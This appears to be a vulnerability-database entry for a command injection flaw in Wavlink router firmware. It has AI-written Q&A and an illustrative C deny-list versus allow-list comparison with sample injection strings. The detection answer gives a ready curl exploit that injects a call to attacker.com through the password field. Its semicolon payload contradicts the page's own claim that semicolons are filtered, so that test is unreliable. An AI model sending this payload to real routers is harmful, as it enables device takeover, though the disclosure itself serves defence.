CVE-2024-48705
BaseFortify
Publication date: 2025-09-02
Last updated on: 2025-09-04
Assigner: MITRE
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| wavlink | wl-wn531p3_firmware | m32a3_v1410_230602 |
| wavlink | wl-wn531p3_firmware | m32a3_v1410_240222 |
| wavlink | wl-wn531p3 | * |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2024-48705 is a post-authentication command injection vulnerability in Wavlink AC1200 routers running firmware versions M32A3_V1410_230602 and M32A3_V1410_240222. It exists in the "set_sys_adm" function within the "adm.cgi" binary, specifically in the password reset process. The vulnerability arises because the "newpass" field provided by the user is not properly sanitized before being used in a shell command. Although the code attempts to block semicolons, it fails to prevent other command injection vectors. This allows an authenticated attacker to inject arbitrary shell commands via the "newpass" parameter, which are then executed by the system, potentially compromising the router. [1]
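The gap between a semicolon-only deny-list and an allow-list, as an added example that is not code from the Wavlink firmware or from this page. The function names, the 8-32 character policy, the permitted character set and the sample strings are all assumptions constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Deny-list filter of the kind described above: rejects only ';'. */
static int denylist_accepts(const char *s)
{
    return strchr(s, ';') == NULL;
}

/* Allow-list filter (assumed policy): 8-32 chars from [A-Za-z0-9_.@-]. */
static int allowlist_accepts(const char *s)
{
    size_t n = strlen(s);
    if (n < 8 || n > 32)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || strchr("_-.@", c) != NULL;
        if (!ok)
            return 0;
    }
    return 1;
}

/* Constructed inputs; "x" stands in for any attacker-chosen text. */
static const char *const samples[] = {
    "Passw0rd_2024", "pass;word1", "pass|word1", "pass`x`word",
    "pass$(x)word",  "pass&word12", "pass\nword12",
};

/* Counts inputs the deny-list lets through but the allow-list rejects. */
static int count_gap(void)
{
    int gap = 0;
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        if (denylist_accepts(samples[i]) && !allowlist_accepts(samples[i]))
            gap++;
    return gap;
}

int main(void)
{
    printf("deny-list passes %d inputs the allow-list rejects\n", count_gap());
    return 0;
}
```

Where the design permits it, passing the value to the target program as a discrete argument or on standard input, without invoking a shell, removes the need for character filtering altogether.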
How can this vulnerability impact me?
This vulnerability can allow an authenticated attacker to execute arbitrary shell commands on the affected Wavlink AC1200 router. This could lead to full compromise of the device, including unauthorized access to sensitive information, modification of router settings, installation of malware, or using the router as a pivot point to attack other devices on the network. Because the attack requires authentication, it is limited to users who can log into the router's web interface, but once exploited, it can severely impact the security and integrity of the network. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by attempting to exploit the command injection in the password reset functionality on the router's web interface. Specifically, sending a crafted POST request to the "/cgi-bin/adm.cgi" endpoint with parameters including "page=sysAdm", "username=admin", "SYSPASS" (current password), and a specially crafted "newpass" parameter containing shell commands can reveal if the system is vulnerable. For example, using curl to send a POST request with a payload in the "newpass" field that attempts to execute a command (such as contacting an attacker-controlled server) can confirm the vulnerability. Example command to test detection: curl -X POST http://<router-ip>/cgi-bin/adm.cgi -d "page=sysAdm&username=admin&SYSPASS=<currentpass>&newpass=validpass;curl http://attacker.com" -d "NEWPASS2=validpass". Successful execution or network activity to the attacker server indicates vulnerability. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the router's web interface to trusted users only, disabling remote management if enabled, and avoiding password resets via the vulnerable web interface until a firmware update is available. Since the vulnerability requires authentication, ensure strong current passwords to prevent unauthorized access. Monitoring network traffic for suspicious outbound connections triggered by exploitation attempts can also help detect active attacks. Ultimately, applying a firmware update from the vendor that addresses this command injection vulnerability is necessary once available. [1]